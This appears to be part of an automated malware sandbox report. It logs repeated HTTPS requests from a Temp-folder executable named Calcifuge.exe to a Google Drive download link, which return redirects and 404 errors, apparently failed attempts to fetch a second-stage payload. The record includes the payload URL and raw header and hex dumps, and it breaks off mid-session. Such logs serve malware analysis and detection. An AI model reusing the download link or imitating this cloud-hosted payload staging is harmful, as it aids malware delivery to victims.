                                                                                              2025-01-11 02:53:07 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:08 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSQbf7AyJOtEdZhRnKoXfDCVkdU56DIgx3DitzMT44VtqD-eGsZ9qb2uLtcJDT3n0CN
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:08 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-zDPM3XdZqNqAWWMAlXQdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 7a 66 37 52 4d 73 4b 35 36 68 41 6a 77 56 47 37 44 6c 53 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7zf7RMsK56hAjwVG7DlSBQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.453635172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:09 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:09 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:09 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-4m8MTBoy-vpZqGpAwxNKOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.453643172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:10 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:10 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQKkP60NIDgEohueAlR17uU2GbLtiiBJKRDvV5qwIwsM9oRl6XM4T3mSJZxRl-HFXcN
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:10 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-k_KXH2BzuqMaH0MFO7zbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 67 77 7a 44 37 71 47 50 36 5f 64 59 5f 7a 6c 30 66 38 43 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XgwzD7qGP6_dY_zl0f8CNQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.453650172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:11 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:11 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:11 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-dNVNZcUVuJJ0pXwAQwdC4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.453659172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:12 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:12 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSbbiD62kraKvvuu3MZ9Dbq3DnRP836M5H8NBtX54p6Tz7Io9v26iZ0sNLWo0-PT6ebb_G0dBM
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:12 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-r3mSy8_vFSl0NRCkUz1qPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 49 72 50 36 65 6e 41 62 31 46 36 75 63 36 33 31 68 4a 63 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AIrP6enAb1F6uc631hJcLA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.453666172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:13 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:14 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:13 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-jY8AAR3P2_UHfbYQ4ueANA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              39192.168.2.453675172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:14 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:15 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQlQiztYfzb5Cw3AnNZ6vldyE9UFHzFm6rShExmjYQrl_VnCLITv8spmut8F5eiaOyoH5IaI4M
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:15 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-iF-sJ2IIt1uldkia9Ec98w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 71 68 34 5f 31 79 41 49 45 46 50 4c 39 79 53 75 64 38 51 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Rqh4_1yAIEFPL9ySud8QgQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              40192.168.2.453683172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:15 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:16 UTC1920INHTTP/1.1 303 See Other
